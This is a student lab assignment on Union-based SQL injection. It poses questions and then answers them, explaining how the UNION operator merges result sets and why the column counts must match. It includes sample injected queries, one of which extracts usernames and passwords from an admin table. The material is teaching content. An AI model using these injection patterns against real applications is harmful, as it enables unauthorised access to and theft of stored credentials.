Lab 9: SQL injection - SQL injection UNION attacks

Objective:
- This lab focuses on exploring and understanding Union-Based SQL Injection attacks.
Participants will engage with a simulated web application that is vulnerable to SQL injection,
specifically through the misuse of the UNION SQL operator. The objective is to learn how to
identify, exploit, and subsequently defend against Union-Based SQL Injection vulnerabilities.

In this lab, students need to:

 Answer the following questions:
o What is a Union-Based SQL Injection attack, and how does it differ from other types of
SQL injection attacks?
o Explain the role of the UNION SQL operator in this type of attack and how it can be used
to extract data from a database that is not typically accessible through the intended use
of a web application.
 Perform challenge:
o SQL injection UNION attack, determining the number of columns returned by the query
 Explain and capture all steps (full windows screen capture).

Submit a report addressing all the questions mentioned above in either PDF or Markdown format.
Additionally, include a video demonstrating the detailed process of your work to ensure the
authenticity of your lab exercise.
The report file name must be Class_YourStudentID _YourName_Lab9

What is a Union-Based SQL Injection attack, and how does it differ from other types of SQL injection
attacks?
A Union-Based SQL Injection is a type of SQL injection attack that exploits the UNION SQL operator to
combine the results of two or more SELECT statements into a single result set. This type of attack
occurs when a web application fails to properly validate or sanitize user input before constructing SQL
queries. Attackers can manipulate input fields to inject malicious SQL code, allowing them to retrieve
sensitive information from a database.
Explain the role of the UNION SQL operator in this type of attack and how it can be used to extract
data from a database that is not typically accessible through the intended use of a web application.
The UNION SQL operator plays a crucial role in Union-Based SQL Injection attacks by allowing
attackers to combine the results of two or more SELECT statements into a single result set. This can be
exploited to extract data from a database that is not typically accessible through the intended use of a
web application.
1. Combining Result Sets: The UNION operator is used to combine the result sets of two SELECT
statements. The structure of a UNION statement looks like this:
SELECT column1, column2 FROM table1 UNION SELECT column3, column4 FROM table2;
In a Union-Based SQL Injection attack, an attacker injects a malicious SQL code containing a UNION
statement into the original query.
2. Exploiting Injection Points: The injected UNION statement is typically added to the WHERE
clause of the original query. For example:
SELECT column1, column2 FROM table WHERE id = '$userInput' UNION SELECT column3, column4
FROM table2 --';
Here, $userInput is the point where the attacker injects malicious code.
3. Matching Column Counts: For a successful Union-Based SQL Injection, the attacker needs to
ensure that the injected SELECT statement returns the same number of columns as the original
query. This is because the UNION operator requires the two SELECT statements to have the
same number of columns in corresponding positions.
4. Extracting Data: If the injection is successful and the number of columns matches, the UNION
operator combines the result sets. The combined result set is then returned as the output of
the injected query. The attacker can use this to extract data that is not typically accessible
through the intended use of the web application.
For example, consider an attack where the injected query retrieves usernames and passwords from a
'users' table:
SELECT username, password FROM users WHERE id = '1' UNION SELECT username, password FROM
admin_users --';
If successful, this query would combine the results of the original query with the results of the
injected query, potentially revealing sensitive information from the 'admin_users' table.
Challenge Link: https://1drv.ms/u/s!AuqMVnroIlhkyEw2ZVkXKWyLEpR3?e=iesUgn